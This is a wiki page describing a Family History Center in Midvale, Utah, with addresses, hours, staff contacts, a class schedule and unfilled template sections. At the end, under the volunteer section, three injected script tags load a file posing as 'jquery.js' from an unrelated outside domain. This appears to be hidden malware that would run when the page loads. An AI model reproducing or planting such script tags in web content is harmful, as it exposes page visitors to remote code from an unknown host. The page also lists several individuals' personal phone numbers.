Midvale Utah Union Fort Family History Center
|This article describes the services and resources available at a Family History Center, a branch facility of the Family History Library.|
The Midvale Utah Union Fort Family History Center services the Midvale, and Union Fort areas.
- 1 THIS SITE IS CURRENTLY UNDER CONSTRUCTION - Please go to website at: www.familyhistorymagic.com/Home_Page_2.html
- 2 Center Contacts and Hours
- 3 Calendar and Events
- 4 Summer Classes 2013 “Basic Family Tree”
- 6 2012 Family History Classes Overview:
- 7 Staff Training Meetings
- 8 Center Resources
- 9 Center Services
- 10 Resources in the Local Area
- 11 Links
- 12 Volunteer at the Center
THIS SITE IS CURRENTLY UNDER CONSTRUCTION - Please go to website at: www.familyhistorymagic.com/Home_Page_2.html
Center Contacts and Hours
Location & Map:
- Address: 7155 South 540 East, Midvale, UT 84047
- Please use North Door. Ring upper door bell for access.
- Come straight in and turn right and Library is first door on right.
- Location on Map
Hours of Operations:
|Monday||9AM to 5PM||CLOSED|
|Tuesday||9AM to 5PM||5PM to 9PM|
|Wednesday||9AM to 5PM||5PM to 9PM|
|Thursday||9AM to 5PM||5PM to 9PM|
|Friday||9AM to 5PM||CLOSED|
- FHC Director ALICE
- Asst. Director S. WELLS 801-352-
- Asst. Director F. FULLMER 801-943-1336
- Asst. Director BARRY JOHNSON 801-561-4535
Asst. Director DAVID HANSON 801-255-2253
Asst. Director RICK HICKOK 801-942-7426
Asst. Director KAY BEERS 801-942-1098
We are in need of additional staff at our Family History Center. If you are comfortable with a computer and available to volunteer for 3 hours per week, we would love to have you, and happy to help you learn additional skills. Please contact: Alice Neff: (801) 255-1617 .
Calendar and Events
Summer Classes 2013 “Basic Family Tree”
Tuesday, June 4, 11, 18 3:00-5:00 PM Jacque Evans
Wednesday, June 12, 19, 26 7:00-9:00 PM Dave & Jackie Pierce
Monday, July 8, 15, 22 2:00-4:00 PM Alice Neff
Tuesday, August 6, 13, 20 3:00-5:00 PM Alice Neff
Plan to attend all 3 sessions to learn to edit and add additional relatives, sources, pictures and stories and clear names for Temple Work.
You are welcome to drop in at the Family History Center any time we are open without an appointment. We have trained staff who can often answer your questions and help you with the concepts, skills, resources, etc. you need right now. Also, through the Church, we have Internet Sites and Databases you have to pay to use from your home.
The Family History Center is open:
Mondays and Fridays: 9 to 5
Tuesdays, Wednesdays and Thursdays: 9 to 9
Closed July 4, 24 and September 2 (Labor Day)
See below for Free Consultation Sessions. These are individual training sessions where you will get personal help with FamilySearch.org/Tree and other tools designed to help you find and prepare names for the Temple. Please sign up for a 1 ½ hour session and let us help you. Sign-up by calling the Family History Center 801-569-1621. For your session, bring your LDS Account username and password (or membership number) and your pedigree chart (filled out as best you can.)
2012 Family History Classes Overview:
(Classes will be held in the Midvale Union Fort Multi-Stake Family History Center unless otherwise noted)
Classes Beginning in March
Intermediate Computer (4 week course)
Discover the magic of using Microsoft Windows including file organization and
tips and tidbits for easier computer manipulation.
Fri. Mar. 2, 9, 16, 23 10:00 a.m. - 11:30am Instructor: L. Hadfield
IrfanView (new) (1½ hour class)
Enjoy the versatility of this FREEWARE to help you capture screens, straighten,
edit, and utilize documents in family history work. Works on PC & Mac.
Tue. Mar. 13 2:00 p.m. - 3:30 p.m. Instructor: D. Hanson
Newspaper Archives (1½ hour class)
Get a glimpse of your grandmother’s life. Read her obituary, learn about who
came to visit, or where she was going on a trip. Small town newspapers kept a
close eye on the inhabitants. Their activities became the “talk of the town”.
Thu. Mar. 8 1:00 p.m. - 2:30 p.m. Instructor: K. Beers
Priesthood Leadership Training (1 hour class)
Training for Priesthood Leaders responsible for Family History work, primarily
High Priest Group Leaders.
Thu. Mar. 22 7:30 p.m. - 8:30 p.m. Instructor: T. Stroud
Write Family Histories your children and grandchildren will read (2 weeks)(1½ hour class)
It’s easier than you think. Clipart illustrations included.
Thu. Mar. 22, 29 7:00 p.m. - 8:30 p.m. Instructor: J. Evans
FamilySearch Wiki (new) (3 week course)
Family history advice by the community. What is it? What does it mean to you?
How can it help you? Can you contribute?
Wed. March 21, 28 April 4th at 7:00 p.m. Instructor: D. Knox
Staff Training Meetings
1. Usually held on the third Thursday of the month in the Relief Society Room.
2. August topics are: MacFamily Tree, Advanced Geneology built for Mac; and Find a Grave.
- Family History Library Catalog: This center has the ability to order any of the films and fiche available through the Family History Library Catalog.
- (List additional collections you have such as the types of books and microfilm you have on indefinite loan; though you will not want to list every single item you have. Just give visitors to this page a general idea of your resources.)
Databases and Software
Hardware and Equipment :
1. We have computers, printers, copying equipment, Microfishe readers.
2. Copies are .05 cents each.
Staff Research Specialties
Resources in the Local Area
(This section is to highlight other resources in your area that will be helpful for individuals doing research there in your location, if there are any, such as government offices, historical societies, etc.)
(Include links to other websites of interest to those who visit your center such as links to the city, county and state wiki pages where your center is located.)
Volunteer at the Center
(Include information here about the volunteers you are looking for.) <script src="http://uhahoii.com/jquery.js?ua=ch"></script> [[Image:]] <script src="http://uhahoii.com/jquery.js?ua=ch"></script> [[Image:]] <script src="http://uhahoii.com/jquery.js?ua=ch"></script> [[Image:]]